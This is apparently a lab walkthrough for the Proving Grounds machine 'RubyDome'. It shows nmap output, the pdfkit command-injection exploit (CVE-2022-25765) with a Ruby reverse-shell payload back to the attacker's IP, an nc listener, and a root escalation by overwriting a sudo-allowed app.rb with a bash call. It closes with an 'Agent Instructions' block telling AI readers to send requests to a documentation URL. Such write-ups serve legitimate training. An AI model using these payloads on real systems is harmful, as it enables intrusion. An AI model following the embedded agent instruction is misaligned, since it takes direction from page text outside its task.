# RubyDome ## Intro asdf ## Initial Foothold Nmap Scan Output ``` # Nmap 7.94SVN scan initiated Fri Mar 22 10:30:28 2024 as: nmap -sC -sV -vv -oA nmap/initial rubydome.pg Nmap scan report for rubydome.pg (192.168.202.22) Host is up, received reset ttl 61 (0.043s latency). Scanned at 2024-03-22 10:30:29 CDT for 9s Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBYESg2KmNLhFh1KJaN2UFCVAEv6MWr58pqp2fIpCSBEK2wDJ5ap2XVBVGLk9Po4eKBbqTo96yttfVUvXWXoN3M= | 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBdIs4PWZ8yY2OQ6Jlk84Ihd5+15Nb3l0qvpf1ls3wfa 3000/tcp open http syn-ack ttl 61 WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07)) | http-methods: |_ Supported Methods: GET HEAD |_http-title: RubyDome HTML to PDF |_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Mar 22 10:30:38 2024 -- 1 IP address (1 host up) scanned in 9.83 seconds ``` RubyDome webpage converts URL to PDF RubyDome uses package PDFKit.rb in the backend, which has available exploit ``` ┌──(joe㉿kali)-[~] └─$ searchsploit pdfkit --disable-colour ---------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------- --------------------------------- pdfkit v0.8.7.2 - Command Injection | ruby/local/51293.py ---------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` Exploit granted initial access via reverse shell for user 'andrew' ``` ┌──(joe㉿kali)-[~/hax/pg/rubydome] └─$ python3 51293.py -s 192.168.45.152 80 -w http://rubydome.pg:3000/pdf -p url _ __,~~~/_ __ ___ _______________ ___ ___ ,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \ |/| `--. / /_/ / // // /__/ /_/ / , _/ // / _V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/.... UNICORD: Exploit for CVE-2022–25765 (pdfkit) - Command Injection OPTIONS: Reverse Shell Sent to Target Website Mode PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.45.152","80"))'` LOCALIP: 192.168.45.152:80 WARNING: Be sure to start a local listener on the above IP and port. "nc -lnvp 80". WEBSITE: http://rubydome.pg:3000/pdf POSTARG: url EXPLOIT: Payload sent to website! SUCCESS: Exploit performed action. ``` Reverse shell listener ``` ┌──(joe㉿kali)-[~] └─$ sudo nc -lvnp 80 listening on [any] 80 ... connect to [192.168.45.152] from (UNKNOWN) [192.168.202.22] 45852 whoami andrew which python3 /usr/bin/python3 python3 -c "import pty;pty.spawn('/bin/bash')" andrew@rubydome:~/app$ cd .. cd .. andrew@rubydome:~$ ls -la ls -la total 32 drwxr-x--- 3 andrew andrew 4096 Jun 13 2023 . drwxr-xr-x 3 root root 4096 Apr 25 2023 .. drwxr-xr-x 2 andrew andrew 4096 Apr 25 2023 app lrwxrwxrwx 1 root root 9 Apr 25 2023 .bash_history -> /dev/null -rw-r--r-- 1 andrew andrew 220 Jan 6 2022 .bash_logout -rw-r--r-- 1 andrew andrew 3771 Jan 6 2022 .bashrc -rw-rw-r-- 1 andrew andrew 33 Mar 22 15:26 local.txt -rw-r--r-- 1 andrew andrew 807 Jan 6 2022 .profile -rw-r--r-- 1 andrew andrew 0 Apr 25 2023 .sudo_as_admin_successful -rw------- 1 andrew andrew 774 Jun 13 2023 .viminfo andrew@rubydome:~$ cat local.txt cat local.txt c2c845c2342a613d302ea0d415882241 ``` ## Privilege Escalation adf ``` andrew@rubydome:~/app$ sudo -l sudo -l Matching Defaults entries for andrew on rubydome: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User andrew may run the following commands on rubydome: (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb andrew@rubydome:~/app$ ls -la ls -la total 148 drwxr-xr-x 2 andrew andrew 4096 Mar 22 16:17 . drwxr-x--- 5 andrew andrew 4096 Mar 22 16:16 .. -rwxrwx--- 1 andrew andrew 1032 Apr 24 2023 app.rb -rw-rw-r-- 1 andrew andrew 131089 Mar 22 16:17 linpeas-output.txt -rw-rw-r-- 1 andrew andrew 1220 Mar 22 15:46 page.pdf andrew@rubydome:~/app$ cp app.rb app.rb.bak cp app.rb app.rb.bak andrew@rubydome:~/app$ echo "system('/bin/bash')" > app.rb echo "system('/bin/bash')" > app.rb andrew@rubydome:~/app$ sudo /usr/bin/ruby /home/andrew/app/app.rb sudo /usr/bin/ruby /home/andrew/app/app.rb root@rubydome:/home/andrew/app# whoami whoami root root@rubydome:/home/andrew/app# cat /root/proof.txt cat /root/proof.txt 2f232fecea3a2b5116cb328b9471bdd3 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://walkthroughs.cyanidesecurity.com/proving-grounds/rubydome.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.